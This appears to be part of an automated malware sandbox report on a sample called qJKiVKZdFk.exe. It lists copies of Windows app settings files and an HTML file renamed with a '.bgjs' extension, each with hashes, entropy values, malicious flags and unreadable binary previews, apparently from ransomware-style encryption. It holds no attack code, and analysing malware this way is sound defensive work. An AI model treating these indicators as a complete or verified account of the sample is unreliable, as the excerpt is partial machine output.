                                                                                                                                      Preview:regf../..R..,...".3..@...7D./y.C....%...W'j.........K...x8..&9.A..S..C....}....x.a.}..r....x.:C.b.R.A.:~.B.jH....%~..wA90.6....-.<.......4+..{..yv>..'..L..'.Mk+...Z.+.9{P5!=kL.RC.k.4.#.y.7...=KRr..k.|Q8Y.n..W..I/7...6.3..... 0f.;..n.xN..*n..W.....Y.CI]j..E.d.P.7...6Z..Y.";C.]..1/...S.w...e.Z.V..l8.q.^<..#...5..xqm.Q.ZLP1\..by..P..Ty..KG..e.V.K}.."=.T;'...tQ,.x.\...UU...N.........i.,.........C.CC..t..G.K...A`..../?l.u.......L..a.....T.E..r368.R..}MI..r'b.{.7..._R....1."W.Y.QxR..mg('...B.,|.&P.H.E..!zD...%-!.d......RE.7d.*"2J.e..D.e..s...*.W4.e.y.?..~x.a.n".w......cz.....qj.0..A.@../... .0.bL....$...C...j.W@8.M.S*.j$..0R.=m.9p..5B.y.....$..l..q.;SoE.......3 E....a..YS.c..k...g..X.0....n...q/..r.>x.....d.G.+.,.I=r9M.xE..,G.T.69..pA.Hg..).....H..!o.+...f.d......Q..H...#.$TS.+..0._...4@....h..Y*..\| |P .118t.:...n-...../..e.......g...9..9.Ap5%.y...[.8..h74.>p..O..Mg.*..=..;)7.@95.''..........e....9..I.Y.....7.Y..D....rEv....K... A.3Z..U.

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978581456032494
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:DNRtHs5DBzOPrjrudMTjAbZeFN5vWC8pvlwf4Z27UqI:pRybzOPredMY2N5uThlwflI
                                                                                                                                      MD5:6AFF0091DECE4B5A3FE809EF09ED8716
                                                                                                                                      SHA1:0D24ABF8276A6EF4F4B05225B77259C6F93095B6
                                                                                                                                      SHA-256:5443D4B6B3C982BAF636BE1BC5145B31306612E1B74D2FAD3D4217544F9C2BAE
                                                                                                                                      SHA-512:950E850A3CB52E7DDBB1AE05AF27E7CA243FD812F746DDB316196E789EA832F2AF399AC233AEE70CA0872BDC8BE59D3E4222DA8E5ABF5669C8DAF8C6AE8C469A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf....."....c.\v..h...B.......dj..!.!...7.HC..e.O^&N.*.....l.{.[.....d.r...#..t.PJ...Ox..x...atI..4.....h..pq.g..T..........2i...K.p..lQ=m .c..5./.3.2.....3-.d.L%.qG.G.G.\%....a...>..R..ly9`.$]..ce....Oi.z..0.l.Pr. .9Q.........6./PT~.^o...b,._#m....5....t.?W^,bv....C..|Z..k.V)...3.S.3.....Q._..$...w/....~.9...0DS)...8;.&...eDV...p5g..WI.Yh#.*6j.....FkD..Q........../...TwX.X\CAU.~.....M.1u.4.^..XA....)S.P..(*..p.u>..I...L.yt......I...>....|m.....x..[,wD..uB..%@....@.....).E..)'X..6.9+....q.o..........m.4.i+^....%0.s......(v....8.+.E..rG+..1.o.$S.;.w.v.D....d....8.(0c..A>.w....;O.z.u4S....B.S)^..........T.v^Z.N.].[G..D..`.S...q...%6.&..|.f....'C.w._..!..C..b\..;-....Fg.l~...xJ....2.p..Za%y..p>3.....s...F.P....P.}.......>yn._...&.&]..c....[+n`...GJ&.....T.j.:..9Q.p..5]..._.A..U..3.}.1.H.(0.o..*..\......}`].&.!..{..~...$.e..}.....x..>.........Y.....8..8.l....)t6.q....q1.........|..0.p..[tN....Q.z.../....>....p..t.../.....bf.:..i..'..7x7.......mE..I...

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979012371540279
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:DBGVmbNTyZR+HwKtcFABLBVAKP5FYqjFXmj6:9ombkZA7mFOgKP7YOcj6
                                                                                                                                      MD5:E209858D7A9EFDC656C9A8C4F8256902
                                                                                                                                      SHA1:53C9DE3E88522D0E48CF332A3CF030032262F486
                                                                                                                                      SHA-256:29611527A9F12BE781A125F496447B133133EA37FF66066812B23C8695F78163
                                                                                                                                      SHA-512:9E1E0ED9F3454B1FB3883DAE14AA66722DBDD6D0BD4769589C534AECAD80C6FEDD8F4E4161E0008C30630D58B606868680567E0C5F7F835F85AC9087EF9BE9F1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..c..m.8%....@Z..;..r"O......5:.......P.4A..,.L..9lQ%....r..k..}....\.=...,...i .F.B...=-n..\.....n.5.J.._).&..P.......,..u...#.........../x...E...........:_.p.D35....6..V........KXA.I......+tq...o...aM._JM...e.$VI~..\.O.E*..KP.O.........Dy..AB..>|N....9*.CWNM..F&q..'.R...!YE.onY..>&/w.22...J.BQ.).T.)4.ttC.!..\.-"..E}..VE..'*4..IP@.'.J...Q....yi.<........yj.....)..0.f..B.2=J.F.....p*M.Z.1.6......H.Bu8...:..zF.*...t$...R.|Bk.s>o..\.......,.....o.Y!`.2....U=.3.....<.n.o.@.q....?.Y.6.'$S.QPy.2.........s?a..$t.b...k.h..AIE:.....y......#@b.N.[....j..6c....H..lJ7+..{5o.L..7...I......:...4...<..?.....E..%..s.v..R.'..\....k.ji..../....E.....2G,....].+.p..Gh.`..5..="..M...P....~....J....wS..<....Y..1...<@&.fj.ZU..q....A~..|..g5..U...UE`..g+k......&...u*...T.H.I.~....n.p.k( .2M....."......-m.......#RP.~...=y.6......&.....5.2k"L...z.....<'.....H.g..gR.....r.^TW0...E.^. .Xk..f.....J..>n.{..B.ux.Y..&.~.K.=.....k.'R..?l..PT1A#o>s.{)Fz.cV..

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977078073843597
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:D/z3aaYzQNpKhPFMXxKXfjijyB2iC1B3u4uqRQyuCn:DMzuKAXS0y8iCHuYRvn
                                                                                                                                      MD5:78418B10CD7895E4B4A61664E5EDC40F
                                                                                                                                      SHA1:53AE9360C3A2EB951F8150A17C912E157FEA95CE
                                                                                                                                      SHA-256:3D78E6D980187968E4CFD305C3AC6D61786479F8D01C74953B882C618639046C
                                                                                                                                      SHA-512:E361A4BA1A87171692F58628CA55B3DAF50EAFF4A74FE44952AAD8123EC0562F4B9D974E81B3523093CEA016B4EA581402389EB650B1CA65FB854DB8087375C5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.t.../.sT....T.XD....c....j..e4....Hr..d......b....6.Y..^4.xK.}.I....Me=[.M.?..E!..S...0...o.W?O.,E@e....t>8X.'.......!R..@.-S..,n@W..G...a..TRW..L^....M`;.!....58.$" ..")i...p.....z...g.A....u.8.p......}N. .B......cb.].g.. .P..~...U..O..Z...1\.Od..n9.u.U.l...8Y.g.5..-#...)...e..3p.i2w....,..^.Wpe9..X.J0Cv..*.Y..f....=..>.8....x".u (..XT....?%....i.tE..O..&y..?W%..2iy....;.Hl.;.....%.0ar..=3-T[.$-IV..#&/...Y..{...7...%:0..+4Q*sLBT.5....;.......<.vc...(M.....r@g.....2O8H.\...Z......".bz.Eb.)w..f..w..o.....I....Oi/..tO....UG[.t..e&....y/K..*v..Ra.~.....%.o..I.....6...S-...D.mE.l.."*...x...?..6..p..y.p..b.m.g8..M.......6.ym...{..]..A.....H......_.%..1..w5..r.a......./T.....{......l,y._...s.B(O..A.S(;>.......I..r.]..V.{=#...|x*dE{.Z`x............Y...6.N&.|OD[.o..Q.!...........M.....r...k.P....y.....T....k..s.*....(H........h!.o......~.. .1.+!Y#.4..1..#"Z........B6.....~.(.8..;AXmV0/hj..p.\...:........;..6..m..w.;.[..$x.Bn.R9`....Q..pq...l

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.980039553179889
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Sv3sBQVvQRY9an9wu5kFoCeA3Us0Qhg83Aq4hNuCiPZ3pF:F6SFP6ZJm83A3uFPZn
                                                                                                                                      MD5:FF4C2369266BB5BFD149A83A6F4E78C8
                                                                                                                                      SHA1:B78C1B4C4E6886306E2D4EB8B00CB3DCCA48EF3E
                                                                                                                                      SHA-256:AC5F5C7A34D28551CFE000891D5FF8EF6E047891CCC0C81A5E6636B58439EBF9
                                                                                                                                      SHA-512:3AB215DB8400622E726BDBDC9BC6BFF09450B50EAF2E766F8C151D4DBD016DDBBB84ECF10DB53D55F42A437238E6DCDF864549C19F7D8952E61802E8FC79B078
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.'....,..+-.;...x=..a....w\ns..Z.p...b.K...%..r..'.....y..J.FBj.>s......~l.lP........-h.."..z..<V....H......5~.....9..@...4&W8w.U..V..$OIe.n.O...X.3fj.EX7.=....mW...k*.N...b...M|...ED..lH...+..n.*...)s.f.....M.)...9.....<.R.<.'`&X.4..C.p>.#..z.s.@.]t.SR...s4....p....TvF.M.....&.L<...U..._tpe....X./.{.*....^RH..3.^,.7....4..tlC..hY..[.7..\..6.+(BU.,..c.u....L..K.`....s....d..Dc..........^%Y.........i.v.8.......z....Ue...>.J.. h\.'%...6I...].....dY1...l.K?%..O......w......D.@...<.....5...+....J.............~...k.G.s..@.d..1..U.Y......3......&......M.|..gJ.PL;X...<;. ....y.3zt/Gi..k.Z|.R...E.S7..LM....m)]..WW..N..`m.....x.T3|.._...|..).7....D.L.../.du..e./......;Lhi.YN@..P...O.Rb...+(..1..q~.sk.;R@...YUwu..>.........._..........0.l...$%.1.H.?....f.,....K.......W..3......o..CS..Jy..y).Acq.|..+.^q..;..^....d......\u.4#1D..{.=!.../.....[p.`.........J.N....z....C.E|}~!.TNA>;.......~M..M]..D.Lav..3X.;..:......A.qI...h.W<%.I^.....C...N.

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.975086968780467
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:JZ7EabRlPm01PWlpHz6yRMHvfgbVVKpAgTH:JtEMPm01+lpTR+HXVv
                                                                                                                                      MD5:8473B7B92D50C8868E9E621A3319498D
                                                                                                                                      SHA1:B6AF5AD8E5E30E716888C68D501051F26DA1AD2F
                                                                                                                                      SHA-256:F92E95A935E193B4B76B742F7145F999D3AAB0AD7D64E14D1F8FA411F97FC792
                                                                                                                                      SHA-512:7C952C46B029A10C7D25DE8B90A5949F04054D87DA5203E60D9B60583987F36058A787A01CA2E9E22C91FF8899837A539A7A9DB9849472E2091100D3878A233D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf....=J...."....sp..Q..ERZ......F.V.....K.6..cR..Y5Y....k.T..q.?...>.p...h.5........\.xl..SV.....d.'....Z.(.=.ai.....Y...O.&....e..&.r?...?.`..6~x..^7...+.......A...K......O.g.J. *...H.".9.@u..i<Fh.%.....P P.....2C..=..U...[.>.........-:.SE...d..j.<..{*S..Y]8R<L....G...l.zo...U..$.76.\p.@R..U..tpa...Y.0...6...R.4....C....a..m..Bk.5.:.LN......+..SX_3,...x......2.r..S|..~n?.&......^..*:6..?.....9.'.a.)........a.2.C.|..s....oJ.E..e.u......Q..MV....?.R9>.}....O...t...G.m..k(.^.z...%j....0%g..l.......\...4U...hk..k..0\.H=...P..Xh*.._r.h.B.|.i.}.'....Q.1...6..*l.p.....x..$...?$S...p.LG....I.G.D....wO..C....V.....9 ..Ar...h.....>.?........7.jN...V.`...i...{.s...>]}`Z...A\.....b.../(`! mH\.]....a..Z......|..pQY...bo.lx....3..Z.G........VA..5.D_wu...vH)3.$..=yCX.2O..W ...9.2.w:...<.Ud;H.UN...+b.'.T.....!.S..../.I... ...Mb...poU....g..n5fq..D:G..9o+Ll7.H..@...]...(.......F%o'/.;.U.}.H.i.....+{........q....1....o9..../.,.aZ.s.+S..D....P.r.

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978492784105414
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:+fpjSSvv0w80gKSEzh8LnktHoGLqh2aYAUzhAP:ajZvvb80gcGkIG5aYHc
                                                                                                                                      MD5:5033EE14098BDF5372725AB9AA7ED5BC
                                                                                                                                      SHA1:DC8DE9F9D77D553FE41DE37F3761884018E6013E
                                                                                                                                      SHA-256:F642552994DE71B3DE0098603728D0198F8811DB9187A3F9CDBF5648111D1F5C
                                                                                                                                      SHA-512:0C5DD8D539D889ADF3F1FF8931D7178C8F6E72266C889DBF42457BDB7EA6B46A2B704F082267038B937EB797EA68C877EC8A675D471C60A44C92D29718E0616B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.eE..8!_.o/.W`&S...YD..3..v.u...Z...m..5Mk...w."...*X@e(zF...............7t`lb.E..w....% '\..A....PX....9..b.../...V.2....Q....7f....B{...b...V(~..Q........^[F<.................q;....wr...X....Z..ajLj.e....&..I.vg.a8~...zx.E. ...T...Z.........F.zKXy.>..............{q..7~.?.0$.....b..5........ML..F.H@..l.B....X.Y@hrf.c...v4-c....h........6|"....WC{c.I$...`e..E...n..p0.S.j..f+...T...F.....a..tD.cq..5....Z.a.t....v..[.....y..o:.....:.|...]..vR...H^./,.<.G,.O..4$.dcDs..j..+..w&.^.:&u.8...o.iK4.<.....]..B........:(..XF...P..L.YE....X.U..I...N.>v...~p...G6.@.^.....f)$Y1...t..RH...rK..mh.$....b3...._.*..Q.#W<\{x.9...r.:F.?DN.Th...t....u.........6..%.,..p.li...u?*......$..-i..>.......Q.x.|..4L..w.l.Y$.......>.a[..Syy..NY.L.'......D....M..E..../.$X...s.(:.l...y.....z.g..$..p:..'...SK.t.JHLcX.a.bFO...........o()....LX...W.D.8.F..?CsdE.9..g....&.2.._..l...ne....:..).[O.....,....*.$I.vs......`0.f .r.Fi #..siG.t.G.J.gE..n.w$...*Kj.4..o.ClX..d-.

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.980658459419385
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:OWAed9Ku7j544uw2AoWfKC/nqw1UYP2oOivIkb/5G2o6CJSo9rzwf5w:Zd4xN18KCShoOVC/Q2o6DGrUS
                                                                                                                                      MD5:C556BDFF92AE09851E017BA0A1604F3A
                                                                                                                                      SHA1:870611252C0B54D804E08A50DEA03B284CBE286E
                                                                                                                                      SHA-256:2626FF27D4CAEC57EB7184F3BBA667E707B59AF11522E76CA7FD1065248B7C97
                                                                                                                                      SHA-512:9D7B87E66FD9CCF982B6226D74E09ED9DE5A7B2F7733C603F3216A78F18CDED5AADC918F52EFA92B1A17E4E97798E63492A3027B74608F6FFF4F318BDFF772CE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..\.7Z....N_...$...{.B.ly.....+.<.D......R.n(.\Xz....H*.s.$.y.&AH..w.G...x~.`.....0H..{@....V{..x..L2.OV.0.........7.^o.?..`Q.....8=C....G.v..t....>...D3...y(P}Df1..7>.*.9.[..HJ..K...J..$_....V...4../y4..X.8^..8.m.O....-..if.....`J..x.....Aj.',...5ik... ...U.Wx.9.Y...v.H.V..^....Hr0...~.."..y!dd.o.Xrl...1O.bsr.`.d.....+.).H8..../.%n..,).;...`...K:.....X..U.+.J...s<z!k...`..l.;Wh.....]..lC...nj..cl..b...e....+`.,..{..~....j..k....>.....%]Nd....0Z5....eK. ._..............nWTz.^.~{.{..M-.t...[.#..C;..^..1A..L...;1.....#......!...m..mt..ooJ"........*..-.*.Hz....E.j...../.H.`^.P6...ak#c\."./#`."....d... .....M..........c_..$...B.. . ..........c...7M.@B=...{2.....D^..!.".3.x...yn.}:>...?.d.../.fW..6^.l..c.^.@.9...l.pO....*\).8...>..!w..XU..i...=..%t....1}q*t_O.>.@p~.....i|....1.D#D..#.T.K..|.gZ..L..#"te...g..4&BZA.........7...P.q...'....f[DT..4..?...E.....h.W.m...66C....W..\xab...QM....R[....(c:.uC...+7..Sv2B)...}.dB..M.....lly...ym0.......&.?.

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.975959049100401
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:gk6uwiAlw8k8YUsU9ccTq6mwMfQDXBYq8bsffp6f:LJAE8psCTfNMfYu7q8
                                                                                                                                      MD5:CBDB6926EBA53DE1756D7D68E96AB790
                                                                                                                                      SHA1:D32D9CEE1660340B5C3A79264AFE3085A8ABE3A0
                                                                                                                                      SHA-256:B80FFE12A8183506AFB22820B52BCFAFB8B179E10EF835EB90E3C784781E9C5B
                                                                                                                                      SHA-512:8AD9CB9D35FC71F6F66855C4042AB895A3763DC13B13D3DC45CD1F6243137E030D47CE0B8DAB96C3F8FE14B1B1B8A1F703348B63A74EED150657A71D8C3628C0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.;.<L.Q......r..9..\.......ti...(y.3..W._T..Y...p:'..9l....I"C......R.......4...e.4..[.......d...:I.".hw!....a......7....l.m.~...\...d.k...C.t...-.7..2......qGv.........1l.la.........I...9.H,.4v#.X}n.hZ.E..j+... .gy...eku./..K..7..B....M.2H...$F.R.... aL...8..-.%dz...Ul*.tr-a.y.&.k.......w.Sd.@.].B..L.^b.L......\....U....)...S......~._.1.u.p..N..`7,,4...K.Qj @.....[H.L...w....`......u..1?..^1...C.ep..a.S3....t..?.\.a.R.\.t ......1...8:fG..b~. ...9.....M...q.s:.?...5,.f......p.(5%.4. D+<.6..C g.$ 4M(..+......V.........4.2.,.h..f.j^T{.['..%.lEd......?.......2^h5P.gn..n.IRU..n.L.D..7..1.76.&^.D.....Ri...E.4'."....<y....G.q....D..I...x.{..!\....d..".......8.0.`[....4..Z.t.~8..fyJ."..A..`......[.. /.H1...9,..U?..........r...=...V.C.*..mmp.0....{.0..V..&<....E.l.A.l.....Ur.e.e.F.n9..&.k.....Dv.....e........j.}.#.....4.......O..w(>.&g.:...Qk.d.6F......Z.M.5!.a(..=n...Q.....KM?N.......l.Gv......E.......$f.iV..:w.jx....b..s...HD.wI<.,q.@..R..

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979418657011107
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:lx1bVMSt0uUlmYYkvh8vWSHfVXNC/xQmMVGR1hZ3PfLiH4i4MU:lHbVMSt2fixfVXNqxQmM4RY4NMU
                                                                                                                                      MD5:18C655972CBAF3F8C4749BB4404517AB
                                                                                                                                      SHA1:DDAA2A5885E413AABD15BAEF353CBED063415726
                                                                                                                                      SHA-256:D8F7A8163E913C56AD6A25A65FFB6628675251E368B5CD699E297F3FFC2AF5FD
                                                                                                                                      SHA-512:8D5A202D4DD16B3C1336C6E11BF8260A633DD2185C71863BCAABBF975CC65EF8832C08968DCD42B617821CDAE29E98A34B448A64E111DBB7BA3D31C4E60DB88C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...&..hU-.5..B....0..9vV..x.'.z>.xWOI.y[J...o..I.9.u.O*...].)....?.M32F...k.j.q.Ww.~.|c....xW.k..C...(. .{....zO.Q.`.G..ZU....^.@..#.'.$...%T+.'sb..t6...I"...K..v._.V..3.....e.2YOKO....g.6.|.,KIH..Ec.:s...k..f...!..L.J..E.y.....u..:|..z....M..?...H..[..p',-.....+.....S7..yp#;^...`=z..=J.N^u..L(....@@e.oe...8.s.~71.{..G.#x,...|L.S......9-K.k...W1q.".F.+...G.]_......A-[.`.Lt^.(7.......E... E<n._G5........k.O2b.e-....i...h.r8.m.N...1..fs.$XMF.c..;...)=...^0_U.95....1..<..Xg\.....Qc.]; .k[.f.2....C..O....L...E..0K."....$../......J...|..(.G.....\......m..+..C:n0a....X"=C........?.s..W]6w.....U...U..(..p..svv59,.h.$....&.(..W.;..X.Y...O..B`......\k.%..3........I...U.KZ........\. F.#.g...._.Z...9.}.D{.....I8.....fsb>.....7n.5...uY.h.P.2._`...3.q.-s+...f..R.......].-Vn.R`..(..kN.X.=...7..d40.7.=..n.Qz.%(...(.v2..o..1l..5.w...1|..z....(.I....Um....{..i..*.7W.+@=..n..#...y..9.].<..hb;.P....Q..G.w#...ydc..X..'...S.y.v..".K....T..U.UO..d.8."../=.OK

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.981504012537229
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:pz+WM1CLxax2CU+ZagqOmMvTC1uHKMUNYr:pz+93BUzMv4k
                                                                                                                                      MD5:A19B061578126015EC18518D98922DFE
                                                                                                                                      SHA1:926F839EAC0605CF646BAEB79ACF5F6CBDFB1A0A
                                                                                                                                      SHA-256:5A197E44FD8628E1DC6D097884AEE10CAC778ABD3CCF11D1B4140D0D81D02B20
                                                                                                                                      SHA-512:A25E95B799D657EFE67698412A7780653FD5E8B776A263E2757ED8C93365A22E4352FEE3371176FD3A8B965BD169E16E9BADA5FF644FBCD0686A91728C919D9F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.....86....4..K.,d.F....X..c.x....83..K....Y...._L3..u1&q...8.v...%....!.8RJu1.:..X....1^...~..`Ji.......6.a..>.JA....k.w..1....7x.x9.1.O.*,./......6.].....zY....y....$'L....`6+.g....)t.fvi..yl>$...2.0.]..d'O...P..Y...^.F.$:.........hA.bo.e.h.......[j..K.....3...A..y.o+.w.a.3.....g.l..V..N...........r.hJ....M....#_p/3..&..rI!....G.........Q.....K26...r.t..(Hu.......j..z..=.P.p0...3.3|...I.r.M._.....I.G.~.......).{E..!r. .g..).......m...F.^.".c..b.k."....]_....>.?."..... ]H.<.}..e...X..."#.QC.|.J..U.O....R5.M..xM...Z...mZ.,.hF..6.&S._..a...:....P..............4W......^..`..I....p....8.....}i...w2.*v..n..........tF#..D.l.v.(f..D..o....Z9T)..y.gS..Q._........<...KO..../.t.\]..#...j..x..^5c.!.....S.aQ .&.t..J.a.....t...Zgh.W..........v....V>...U..,.....J... F.jj.%9.{y.VT.L8.e.i.?|..5.E.H.1.'2`^X..9G3.rl%E.Q..U..vG~.e`.......}........'..q....9.So@ls..+......;'...(..i..Dy......Q..W......:..U.......h#..xm.K..W.u....3...0..?.</.n...c.s..8Vge..I.h*.

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):107523
                                                                                                                                      Entropy (8bit):7.998338036159156
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:3072:rRkK0DNVNIfk+Eiu2zwWKRJ3mzHb/8P5t:rRkKKGfkge3lj
                                                                                                                                      MD5:7D886C8173ED64CAA1E19E2CF12AD326
                                                                                                                                      SHA1:1532FBF7C0C1C116300EDB953B92F762974C504D
                                                                                                                                      SHA-256:AD5695B5EA44F6FE4CEEB59F6D2D7ACE9C6342D857A8E8DBCDB8E3787D97D9AB
                                                                                                                                      SHA-512:2DCAAF3C916097BBFECA246F9A3BB64A7CA50625D8D12E0BBA8A464044E364A1A3BE284DDDF23648CB5586AFFDF4CED22586852A660881BF142A838CD8DB2BBB
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:<!doczA:.........Df.<....q.X...0b.E..)..../..^.46.Y....;...~R...s....~.l.F.Q.....R..............j...G..;e.7ka..o=+Y.G.g._.... .q.8P.-.../..Oq.!.V/9......O..f2k.N..k~%.y......h..E....<...Jn...2.q.Y^..u..E.....N.S.D$./..r...zj..9b.........2....j...=.W%..L ..&. ]..aY.....h.8.3......I...]/..-....z...<.._1.t.,^ z.2...#Y$...a...x.f.|.6...x.h..T..J.R6w.E.X)....S..C..~j.D2r..r....t\..*?G\.e...1.}[....aI}.C...u......Px....{m+s..i.....K.n.ql....!.....{S.G..F..;h#...q...*..b...;Ij7..>........?.1ehnB.....`.......h....a.[.n.T|....}.U....Gk.;K..n.....P@...5.......,...4Fa...T..............S....Tc..K....JX..RO#ngE.[.0.Af.p.*NO....W...P..W.>....A..0''N...../..7.........=N..!.,H.r..uB.u,e..A.Q....-..qo$fjt.....oG..ox..o....F.9y.Th.?,..I.d.@.....zn!.......j....?.K...# ..8.......J.g.............I.~..z.&.F..[#H.7..B.bT. ..Vb.....).}R.g6n.(*....W.N..E.2.....(!q,...D....3.z.....f))P.....^4..b|...>Q..."..3..,...".arZ.@-zS..w.....D1s:..Q...1.......K.-.<../

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat.LOG1.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977832654969053
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:gY9/hwwnu7HLLW/desNG2E+6FE5F5vg+YDr1RMEtO2E:gY951kHLLWF42rTF5XChRMEE
                                                                                                                                      MD5:D936451B5827E84DE3B56C92FC828D48
                                                                                                                                      SHA1:82F0A70BFD7306964CB94FE67C53F00B71C8E072
                                                                                                                                      SHA-256:E7C403FC032B26E14088EBC8FA9947DC181746D1D12BF07D701553F700550E92
                                                                                                                                      SHA-512:FAFF04DDF1492F0F4C4E18C1FBC2DDF1C76B9FB3CFBC8782A0B5F7EFEF4935AC82346E2DCED1F1CC859412E3E85FF777D4A700091200580D83D41D724E86C19E
                                                                                                                                      Malicious:false
